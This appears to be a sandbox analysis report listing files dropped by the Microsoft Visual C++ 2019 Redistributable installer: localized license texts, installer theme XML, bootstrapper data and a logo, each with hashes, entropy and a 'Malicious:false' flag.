                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMOS DE LICEN\'c7A PARA SOFTWARE MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Estes termos de licen\'e7a formam um contrato firmado entre a Microsoft Corporation (ou com base no seu pa\'eds de resid\'eancia, uma de suas afiliadas) e voc\'ea. Eles se aplicam ao software indicado acima. Os termos tamb\'e9m se aplicam a quaisquer servi\'e7os ou atualiza\'e7\'f5es da Microsoft para o software, exceto at\'e9 a extens\'e3o de que eles tenham termos diferentes.\par..\b SE VOC\'ca CONCORDAR COM ESTES TERMOS DE LICEN\'c7A, TER\'c1 OS DIREITOS INDICADOS ABAIXO.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\t

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1046\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3095
                                                                        Entropy (8bit):5.150868216959352
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO5es/4ThDzmU6lDj4N3mBl0N+NWNP4hHCc9skPDXeKKeK9KfKt4eJ2RQdg:uDiTlJhJGl2UsZMLe6
                                                                        MD5:BE27B98E086D2B8068B16DBF43E18D50
                                                                        SHA1:6FAF34A36C8D9DE55650D0466563852552927603
                                                                        SHA-256:F52B54A0E0D0E8F12CBA9823D88E9FD6822B669074DD1DC69DAD6553F7CB8913
                                                                        SHA-512:3B7C773EF72D40A8B123FDB8FC11C4F354A3B152CF6D247F02E494B0770C28483392C76F3C222E3719CF500FE98F535014192ACDDD2ED9EF971718EA3EC0A73E
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Instala..o</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Tem certeza de que deseja cancelar?</String>.. <String Id="HelpHeader">Ajuda da Instala..o</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [diret.rio - instala, repara, desinstala ou.. cria uma c.pia local completa do pacote no diret.rio. Install . o padr.o..../passive | /quiet - exibe a IU m.nima sem nenhum prompt ou n.o exibe nenhuma IU e.. nenhum prompt. Por padr.o, a IU e todos os prompts s.o exibidos...../norestart - suprime qualquer tentativa de reiniciar. Por padr.o, a IU perguntar. antes de reiniciar

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1049\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):31915
                                                                        Entropy (8bit):3.6440775919653996
                                                                        Encrypted:false
                                                                        SSDEEP:384:ntaMxngQEqQUaAEJxkSjjujcme51oVwuZOFsrnkGxunWxGc9wtvVYgCzkSxN1S2:npgnmWWNEvVYgCzxD
                                                                        MD5:A59C893E2C2B4063AE821E42519F9812
                                                                        SHA1:C00D0B11F6B25246357053F6620E57D990EFC698
                                                                        SHA-256:0EC8368E87B3DFC92141885A2930BDD99371526E09FC52B84B764C91C5FC47B8
                                                                        SHA-512:B9AD8223DDA2208EC2068DBB85742A03BE0291942E60D4498E3DAB4DDF559AA6DCF9879952F5819223CFC5F4CB71D4E06E4103E129727AACFB8EFE48403A04FA
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset204 Tahoma;}{\f1\fnil\fcharset0 Tahoma;}{\f2\fnil\fcharset204 Garamond;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang1049\'d3\'d1\'cb\'ce\'c2\'c8\'df \'cb\'c8\'d6\'c5\'cd\'c7\'c8\'c8 \'cd\'c0 \'cf\'d0\'ce\'c3\'d0\'c0\'cc\'cc\'cd\'ce\'c5 \'ce\'c1\'c5\'d1\'cf\'c5\'d7\'c5\'cd\'c8\'c5 MICROSOFT\par..\f1\lang9 MICROSOFT VISUAL C++ 2019 RUNTIME\par..\b0\f0\lang1049\'cd\'e0\'f1\'f2\'ee\'ff\'f9\'e8\'e5 \'f3\'f1\'eb\'ee\'e2\'e8\'ff \'eb\'e8\'f6\'e5\'ed\'e7\'e8\'e8 \'ff\'e2\'eb\'ff\'fe\'f2\'f1\'ff \'f1\'ee\'e3\'eb\'e0\'f8\'e5\'ed\'e8\'e5\'ec \'ec\'e5\'e6\'e4\'f3 \'ea\'ee\'f0\'ef\'ee\'f0\'e0\'f6\'e8\'e5\'e9 Microsoft (\'e8\'eb\'e8, \'e2 \'e7\'e0\'e2\'e8\'f1\'e8\'ec\'ee\'f1\'f2\'e8 \'ee\'f2 \'ec\'e5\'f1\'f2\'e0 \'e2\'e0\'f8\'e5\'e3\'ee \'ef\'f0\'ee\'e6\'e8\'e2\'e0\'ed\'e8\'ff, \'ee\

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1049\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4150
                                                                        Entropy (8bit):5.444436038992627
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlDhQt9esbrohDTWJt49kAr7DHN3m5GNDCNvNLIkflhrWncPingGdZwK1Kqp:uDiTlDYVgmt4xJ88k193ipzjvL
                                                                        MD5:17C652452E5EE930A7F1E5E312C17324
                                                                        SHA1:59F3308B87143D8EA0EA319A1F1A1F5DA5759DD3
                                                                        SHA-256:7333BC8E52548821D82B53DBD7D7C4AA1703C85155480CB83CEFD78380C95661
                                                                        SHA-512:53FD207B96D6BCF0A442E2D90B92E26CBB3ECC6ED71B753A416730E8067E831E9EB32981A9E9368C4CCA16AFBCB2051483FDCFC474EA8F0D652FCA934634FBE8
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.... <String Id="Caption">......... ......... [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">....... .. .........</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [.......] - ........., .............., ........ ..... ........ ...... ......... ..... ...... . ......... .. ......... - ............../passive | /quiet - ........... ....

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1055\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13379
                                                                        Entropy (8bit):5.214715951393874
                                                                        Encrypted:false
                                                                        SSDEEP:192:1fGkc01jIjZTUDUTvXt2QpfC5VAlCPpDwuOfH7df3YwnnbZIWG2XjQeoO9uBO8CA:Iiqx4Uh2QpMVA8haDdv9nbZzG6oQR2
                                                                        MD5:BD2DC15DFEE66076BBA6D15A527089E7
                                                                        SHA1:8768518F2318F1B8A3F8908A056213042A377CC4
                                                                        SHA-256:62A07232017702A32F4B6E43E9C6F063B67098A1483EEDDB31D7C73EAF80A6AF
                                                                        SHA-512:9C9467A2F2D0886FF4302A44AEA89734FCEFBD3CBE04D895BCEACBA1586AB746E62391800E07B6228E054014BE51F14FF63BA71237268F94019063C8C8B7EF74
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT YAZILIMI L\f1\u304?SANS KO\'aaULLARI\par..\f0 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Bu lisans ko\f1\'baullar\u305?, Microsoft Corporation (veya ya\'baad\u305?\u287?\u305?n\u305?z yere g\f0\'f6re bir ba\f1\u287?l\u305? \'bairketi) ile sizin aran\u305?zda yap\u305?lan anla\'bamay\u305? olu\'baturur. Bu ko\'baullar, yukar\u305?da ad\u305? ge\f0\'e7en yaz\f1\u305?l\u305?m i\f0\'e7in ge\'e7erlidir. \f1\'aaartlar, yaz\u305?l\u305?m i\f0\'e7in t\'fcm Microsoft hizmetleri veya g\'fcncelle\f1\'batirmeleri i\f0\'e7in, beraberlerinde farkl\f1\u305? \'baartlar bulunmad\u305?\u287?\u305? s\f0\'fcrece ge\'e7erlidir.\par..\b BU L\f1\u304?SANS \'aaARTLARINA UYDU\u286?UNUZ TAKD\u304?RDE A\'aaA\u286?IDAK\u3

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\1055\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3221
                                                                        Entropy (8bit):5.280530692056262
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOaesHEqhDTHV4zVy6oBzdp0DYK2GP2ZmN3majyNXNoNKQXVvChcPc+WKb0:uDiTl3PHcIflKNTPgdi12xgg
                                                                        MD5:DEFBEA001DC4EB66553630AC7CE47CCA
                                                                        SHA1:90CED64EC7C861F03484B5D5616FDBCDA8F64788
                                                                        SHA-256:E5ABE3CB3BF84207DAC4E6F5BBA1E693341D01AEA076DD2D91EAA21C6A6CB925
                                                                        SHA-512:B3B7A22D0CDADA21A977F1DCEAF2D73212A4CDDBD298532B1AC97575F36113D45E8D71C60A6D8F8CC2E9DBF18EE1000167CFBF0B2E7ED6F05462D77E0BCA0E90
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Kurulumu</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.ptal etmek istedi.inizden emin misiniz?</String>.. <String Id="HelpHeader">Kurulum Yard.m.</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [dizin] - y.kler, onar.r, kald.r.r ya da.. dizindeki paketin tam bir yerel kopyas.n. olu.turur. Varsay.lan install de.eridir...../passive | /quiet - en az d.zeyde istemsiz UI g.sterir ya da hi. UI g.stermez ve.. istem yoktur. Varsay.lan olarak UI ve t.m istemler g.r.nt.lenir...../norestart - yeniden ba.lama denemelerini engeller. Varsay.lan olarak UI yeniden ba.l

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\2052\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):17863
                                                                        Entropy (8bit):3.9617786349452775
                                                                        Encrypted:false
                                                                        SSDEEP:192:BxoqPyOj+/8Tk5VigWgijAlk5xWvSCI5lgios0EhGXxGMLVGW+uUoqyLZDvAJxMx:vbIeaE7q3KGgzD2
                                                                        MD5:3CF16377C0D1B2E16FFD6E32BF139AC5
                                                                        SHA1:D1A8C3730231D51C7BB85A7A15B948794E99BDCE
                                                                        SHA-256:E95CA64C326A0EF7EF3CED6CDAB072509096356C15D1761646E3C7FDA744D0E0
                                                                        SHA-512:E9862FD0E8EC2B2C2180183D06535A16A527756F6907E6A1D2DB85092636F72C497508E793EE8F2CC8E0D1A5E090C6CCF465F78BC1FA8E68DAF7C68815A0EE16
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset134 SimSun;}{\f1\fnil\fcharset0 Tahoma;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9\'ce\'a2\'c8\'ed\'c8\'ed\'bc\'fe\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\f1\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f0\'d5\'e2\'d0\'a9\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\'ca\'c7\f1 Microsoft Corporation\f0\'a3\'a8\'bb\'f2\'c4\'fa\'cb\'f9\'d4\'da\'b5\'d8\'b5\'c4\f1 Microsoft \f0\'b9\'d8\'c1\'aa\'b9\'ab\'cb\'be\'a3\'a9\'d3\'eb\'c4\'fa\'d6\'ae\'bc\'e4\'b4\'ef\'b3\'c9\'b5\'c4\'d0\'ad\'d2\'e9\'a1\'a3\'d5\'e2\'d0\'a9\'cc\'f5\'bf\'ee\'ca\'ca\'d3\'c3\'d3\'da\'c9\'cf\'ca\'f6\'c8\'ed\'bc\'fe\'a1\'a3\'d5\'e2\'d0\'a9\'cc\'f5\'bf\'ee\'d2\'b2\'ca\'ca\'d3\'c3\'d3\'da\'d5\'eb\'b6\'d4\'b8\'c3\'c8\'ed\'bc\'fe\'b5\'c4\'c8\'ce\'ba\'ce\'ce\'a2\'c8\'ed\'b7\'fe\'ce\'f1\'bb\'f2\'b8\'fc\'d0\'c2\'a3\'ac\'b5\'ab\'d3\'d0\'b2\'bb\'cd\

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\2052\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2978
                                                                        Entropy (8bit):6.135205733555905
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtKesi+hDtkQf7lz+W0gopN3m5+3cNONeN1ra8vWqPtlTKxKUTKlKXRoR+:uDiTlV5kQR9GLeE0ZxV6gIV
                                                                        MD5:3D1E15DEEACE801322E222969A574F17
                                                                        SHA1:58074C83775E1A884FED6679ACF9AC78ABB8A169
                                                                        SHA-256:2AC8B7C19A5189662DE36A0581C90DBAD96DF259EC00A28F609B644C3F39F9CA
                                                                        SHA-512:10797919845C57C5831234E866D730EBD13255E5BF8BA8087D53F1D0FC5D72DC6D5F6945DBEBEE69ACC6A2E20378750C4B78083AE0390632743C184532358E10
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">......</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [..] - .......... ..................Install ........../passive | /quiet - ..... UI ......... UI ... ........ UI ........../norestart - ..................... UI.../log log.txt - ............. %TEMP% ...

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\3082\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):10714
                                                                        Entropy (8bit):5.122578090102117
                                                                        Encrypted:false
                                                                        SSDEEP:192:WthGE/9wd8eQF/hJOmQeNrXT77uOlQ+v3AqHqc3wpXGYdjvsk2cwBb2:mhGuhj+ed388Bb2
                                                                        MD5:FBF293EE95AFEF818EAF07BB088A1596
                                                                        SHA1:BBA1991BA6459C9F19B235C43A9B781A24324606
                                                                        SHA-256:1FEC058E374C20CB213F53EB3C44392DDFB2CAA1E04B7120FFD3FA7A296C83E2
                                                                        SHA-512:6971F20964EF74B19077EE81F953342DC6D2895A8640EC84855CECCEA5AEB581E6A628BCD3BA97A5D3ACB6CBE7971FDF84EF670BDDF901857C3CD28855212019
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 T\'c9RMINOS DE LA LICENCIA DE SOFTWARE DE MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME\par..\b0 Estos t\'e9rminos de licencia constituyen un contrato entre Microsoft Corporation (o, en funci\'f3n de donde resida, una de sus filiales) y usted. Se aplican al software antes mencionado. Los t\'e9rminos tambi\'e9n se aplican a cualquier servicio o actualizaci\'f3n de Microsoft para el software, excepto en la medida que tengan t\'e9rminos diferentes.\par..\b SI USTED CUMPLE CON LOS PRESENTES T\'c9RMINOS DE ESTA LICENCIA, DISPONDR\'c1 DE LOS DERECHOS QUE SE DESCRIBEN A CONTINUACI\'d3N.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\3082\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3265
                                                                        Entropy (8bit):5.0491645049584655
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO/esS6VGhDv4tiUiyRUqzC4U+aD6N3m7xNh1NWNGbPz+9o3PWeKK9K9KfT:uDiTlxouUTiySqyIwz9sgxqvjIk8
                                                                        MD5:47F9F8D342C9C22D0C9636BC7362FA8F
                                                                        SHA1:3922D1589E284CE76AB39800E2B064F71123C1C5
                                                                        SHA-256:9CBB2B312C100B309A1B1495E84E2228B937612885F7A642FBBD67969B632C3A
                                                                        SHA-512:E458DF875E9B0622AEBE3C1449868AA6A2826A1F851DB71165A872B2897CF870CCF85046944FF51FFC13BB15E54E9D9424EC36CAF5A2F38CE8B7D6DC0E9B2363
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalaci.n de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.Est. seguro de que desea cancelar la operaci.n?</String>.. <String Id="HelpHeader">Ayuda de configuraci.n</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - instala, repara, desinstala o.. crea una copia local completa del paquete en el directorio. La opci.n predeterminada es la instalaci.n...../passive | /quiet - muestra una IU m.nima sin solicitudes o no muestra ninguna IU ni.. solicitud. De forma predeterminada, se muestran la IU y todas las solicitudes...../norestart - elimina cualquier intento

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\BootstrapperApplicationData.xml

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (591), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):13188
                                                                        Entropy (8bit):3.7277002414324074
                                                                        Encrypted:false
                                                                        SSDEEP:192:X0s1PoDnH5zHqQHG0Hd8Hz7HE06HA0rH3pKp5cxLU71zLG0Lw4cBx7z8NkzzkvQY:X0sN0dLbmnoNEQkxJM4ZVEpPEv
                                                                        MD5:58518543644BAA7BFC6B67B251AF84FF
                                                                        SHA1:97D4538050BB6D1BDE14A918385038E651389E33
                                                                        SHA-256:650B3CC3CDB3630ED9FCF8E5E493E28586B5F7768F5ADC317D884B8184CBE15E
                                                                        SHA-512:A2F2E514A941972E85CDA0DACC154EDF5BBADFD32359FE79203EE28A048E4AD16712078B468515F5CDDA625DFCA3CF5EEFFCE3D3CCFA254841958BC0806B1726
                                                                        Malicious:false
                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.a.l.C.o.n.d.i.t.i.o.n. .C.o.n.d.i.t.i.o.n.=.".V.e.r.s.i.o.n.N.T.6.4. .&.g.t.;.=. .v.6...0. .O.R. .(.V.e.r.s.i.o.n.N.T.6.4. .=. .v.5...2. .A.N.D. .S.e.r.v.i.c.e.P.a.c.k.L.e.v.e.l. .&.g.t.;.=. .1.).". .M.e.s.s.a.g.e.=.".[.W.i.x.B.u.n.d.l.e.N.a.m.e.]. .c.a.n. .o.n.l.y. .b.e. .i.n.s.t.a.l.l.e.d. .o.n. .W.i.n.d.o.w.s. .X.P. .S.P.1. .(.x.6.4.). .a.n.d. .n.e.w.e.r. .p.l.a.t.f.o.r.m.s...". ./.>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.5.-.2.0.1.9. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e. .(.x.6.4.). .-. .1.4...2.1...2.7.7.0.2.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".y.e.

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):9046
                                                                        Entropy (8bit):5.157073875669985
                                                                        Encrypted:false
                                                                        SSDEEP:192:W8lZ1UVDWkgWZTIsvPhghtQ1Qf4lCfnEtHixEGx736wHqItfSpOy2:9T15WZMgAYlOnjt5HLoL2
                                                                        MD5:2EABBB391ACB89942396DF5C1CA2BAD8
                                                                        SHA1:182A6F93703549290BCDE92920D37BC1DEC712BB
                                                                        SHA-256:E3156D170014CED8D17A02B3C4FF63237615E5C2A8983B100A78CB1F881D6F38
                                                                        SHA-512:20D656A123A220CD3CA3CCBF61CC58E924B44F1F0A74E70D6850F39CECD101A69BCE73C5ED14018456E022E85B62958F046AA4BD1398AA27303C2E86407C3899
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT SOFTWARE LICENSE TERMS\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. They apply to the software named above. The terms also apply to any Microsoft services or updates for the software, except to the extent those have different terms.\par..\b IF YOU COMPLY WITH THESE LICENSE TERMS, YOU HAVE THE RIGHTS BELOW.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 INSTALLATION AND USE RIGHTS. \b0\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-363\

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\logo.png

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):1861
                                                                        Entropy (8bit):6.868587546770907
                                                                        Encrypted:false
                                                                        SSDEEP:24:q36cnTKM/3kTIQiBmYKHeQWalGt1Sj9kYIt1uZ+bYOQe0IChR95aW:qqiTKMPuUBm7eQJGtYJM1uZCVszaW
                                                                        MD5:D6BD210F227442B3362493D046CEA233
                                                                        SHA1:FF286AC8370FC655AEA0EF35E9CF0BFCB6D698DE
                                                                        SHA-256:335A256D4779EC5DCF283D007FB56FD8211BBCAF47DCD70FE60DED6A112744EF
                                                                        SHA-512:464AAAB9E08DE610AD34B97D4076E92DC04C2CDC6669F60BFC50F0F9CE5D71C31B8943BD84CEE1A04FB9AB5BBED3442BD41D9CB21A0DD170EA97C463E1CE2B5B
                                                                        Malicious:false
                                                                        Preview:.PNG........IHDR...@...@.............sRGB.........gAMA......a.....PLTE].q^.r_.r_.s`.s`.s`.ta.ta.ub.ub.vc.vd.vd.vd.we.we.xe.xg.yg yg zh zh"zi"{j#|i${j$|n*~n*.n,.o,.p..q0.r2.s3.t5.x;.x<.y>.z?.|B.~C.}E..F..F..H..I..J..L..O..P..W..Y..^..a..c..g..i..q..r..}.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................S......pHYs..%...%....^.....tEXtSoftware.Paint.NET v3.5.100.r.....IDATXG..iW.@...EJ.$M...`AEpG..7TpWT@\.."....(..(.._;...di:9.c>q..g....T...._...-....F..+..w.

                                                                        C:\Windows\Temp\{36CC976F-BDDA-47B0-BB5A-7568B395BA2A}\.ba\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2952
                                                                        Entropy (8bit):5.052095286906672
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTl/+desK19hDUNKwsqq8+JIDxN3mt7NlN1NVvAdMcgLPDHVXK8KTKjKnSnYF:uDiTl/BbTxmup/vrxATd
                                                                        MD5:FBFCBC4DACC566A3C426F43CE10907B6
                                                                        SHA1:63C45F9A771161740E100FAF710F30EED017D723
                                                                        SHA-256:70400F181D00E1769774FF36BCD8B1AB5FBC431418067D31B876D18CC04EF4CE
